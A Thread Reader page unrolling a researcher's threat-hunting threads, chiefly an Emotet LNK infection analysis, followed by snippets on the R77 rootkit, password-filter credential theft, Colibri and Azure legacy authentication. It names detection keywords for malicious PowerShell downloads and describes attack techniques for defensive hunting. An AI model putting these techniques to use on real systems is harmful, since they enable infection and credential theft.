Share this page!

Maybe Scrolly?
Stephan Berger Profile picture
Twitter logo
May 9 8 tweets 5 min read
1/ @ESET (see tweet below) has reported that #Emotet uses LNK attachments for the initial infection vector.

We can download a sample from Bazaar by @abuse_ch for doing our own analysis (sample from 2022-05-02).

bazaar.abuse.ch/sample/ce7191e…

#CyberSecurity
2/ exiftool works very well to find out the path and command line arguments of the malicious LNK file:
3/ The analyzed sample from @Netskope calls PowerShell directly. However, in our sample, cmd.exe is called first, then PowerShell with a base64 encoded command argument.

Picture taken from here - an analysis worth reading:
netskope.com/blog/emotet-ne…
4/ This infection mechanism is an excellent opportunity to point out that PowerShell script block logging should be enabled globally.

The @splunk Threat Research Team has written a blog with related detections. Even if Splunk is not used as SIEM, have a look at the detections.
/5 For example, hunt inside the PS logs for the keyword "$DoIt", a function of the DKMC framework we also see repeatedly in our IR cases, or hunt for the keyword IWR (Invoke-WebRequest), which Emotet uses for downloading the second stage code.

splunk.com/en_us/blog/sec…
6/ Or use @velocidex for hunting convenient inside the PowerShell logs 🙏💙
7/ Coming back to Emotet, collect all ASEP (Auto-Start Extensibility Points) in your network and specifically look for services that have regsrv32.exe in the ImagePath.

#ThreatHunting
8/ The random names in the System32 directory should be easy to find.

(Image taken from the Netskope blog, see the third tweet for the link).

Good luck 🍀

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Stephan Berger

Stephan Berger Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @malmoeb

Stephan Berger Profile picture
May 8
1/ #ThreatHunting: @Avast mentions in its Q1 Threat Report that one-third of their observed rootkit activity are due to the Ring-3 rootkit R77.

Here are two hunting approaches to detect R77 on an infected system. 🧵

#CyberSecurity
2/ R77 is an open-source rootkit that attempts to hide the existence on the infected system at various levels (screenshot).

As stated on the GitHub repo, e.g., all entities where the name starts with "$77" are hidden.

github.com/bytecode77/r77…
3/ The installer creates two scheduled tasks for the 32-bit and the 64-bit r77 service, according to the GitHub Readme.

After running the installer on our lab system, no new scheduled task is visible inside the Tasks folder.
Read 10 tweets
Stephan Berger Profile picture
May 6
1/ As always, an excellently written blog post by @Mandiant.

In addition to the hunting strategies outlined in the blog, I see another hunting-angle that could be worthwhile. 🧵🥷

mandiant.com/resources/unc3…

#CyberSecurity
2/ The TA deployed the C2 agent "on opaque network appliances within the victim environment; think backdoors on SAN arrays, load balancers, and wireless access point controllers. These kinds of devices don’t support antivirus or endpoint detection and response tools (EDRs),
3/ subsequently leaving the underlying operating systems to vendors to manage."

The C2 agent on the compromised servers and systems uses DynDNS domains to communicate with the C2 server.

The use of an internal DNS server, which also logs the DNS queries over an extended
Read 5 tweets
Stephan Berger Profile picture
May 6
1/ #ThreatHunting: @SentinelOne blogged about a Chinese TA called Moshen Dragon that uses password filters to read plaintext passwords (when they are changed).

sentinelone.com/labs/moshen-dr…
2/ The idea of using a password filter to get plaintext passwords is not new and was (first?) documented back in 2013 by @mubix:

blog.carnal0wnage.com/2013/09/steali…
3/ Thanks to @spotheplanet's code, we can test this scenario in our lab (or use the project linked on the SentinelOne blog):

ired.team/offensive-secu…
Read 11 tweets
Stephan Berger Profile picture
Apr 28
1/ #Linux #Forensics: pssst... I will now reveal my favorite interview question for candidates who want to work in our IR team ;) "In the process list, I see a (running) binary, but the binary is no longer present on disc. How can I restore the original binary? (screenshot 👇)" Image
2/ Many candidates (and other analysts) I have spoken to did not know the (simple?) answer.

Under /proc/[pid]/exe, a 1:1 copy of the executed binary is stored! As you can see in the screenshot, the hash sums of both binaries match precisely. Image
3/ According to the proc(5) manpage:

"You can even type /proc/[pid]/exe to run another copy of the same executable that is being run by process [pid]."
Read 4 tweets
Stephan Berger Profile picture
Apr 24
1/ #Azure #Hardening Tip #5: Legacy authentication to bypass MFA in Azure AD

"One of the most common methods used by attackers to gain access to Azure tenants is credential theft or password spraying with legacy authentication protocols. Legacy authentication protocols
2/ do not support MFA and (if enabled) can be used to gain access to hosted data and resources via Azure AD."

☝️Quote from the M-Trends 2022 Report.

A few weeks ago, I created a presentation titled "Attack target Azure", where these two points are also outlined as the most
3/ common methods (used by attackers) into Azure Tenants.

To better secure Azure Tenants, I recommend creating an evaluation of the applications that still use legacy authentication protocols. The use of these protocols should be prevented with Conditional Access Policies (CAP).
Read 6 tweets
Stephan Berger Profile picture
Apr 23
#ThreatHunting:

1/ When examing AutoRuns entries during an IR or CA - would you consider a Scheduled Task with the name COMSurrogate and with the following launch string as malicious (spoiler: it is 😉)?

"powershell.exe" -windowstyle hidden

#CyberSecurity #dfir
2/ @Malwarebytes has found out that the Colibri malware on Windows 10 systems (and up) drops a file called Get-Variable.exe in the path %APPDATA%\Local\Microsoft\WindowsApps.
3/ "It so happens that Get-Variable is a valid PowerShell cmdlet which is used to retrieve the value of a variable in the current console. Additionally, WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable command is issued on PowerShell
Read 7 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

:(